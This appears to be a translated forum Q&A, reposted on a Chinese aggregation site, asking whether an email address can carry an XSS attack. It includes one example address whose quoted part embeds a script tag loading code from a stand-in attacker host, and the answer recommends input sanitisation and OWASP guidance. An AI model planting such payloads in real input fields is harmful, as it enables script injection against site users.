我想知道电子邮件地址是否可以用于XSS攻击。
假设有一个网站,人们可以在其中注册并提供他的电子邮件地址。如果有人想要攻击给定的网站,他或她可能会创建一个电子邮件地址,例如:
"<script src=//my.evil.site/is/attacking/u.js></script>"@stmpname.com
然后使用该电子邮件地址攻击该网站。
电子邮件地址中是否允许引用或脚本标签?
您示例中的电子邮件地址似乎有效。唯一的角色是unusual是报价"
——其余的均有效。
维基百科 http://en.wikipedia.org/wiki/Email_address#Syntax表明您指定的电子邮件地址有效。
您需要确保任意用户输入在渲染之前经过清理。
首先,您可能需要参考以下信息XSS https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29 and 预防 https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet可以在OWASP https://www.owasp.org/.
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)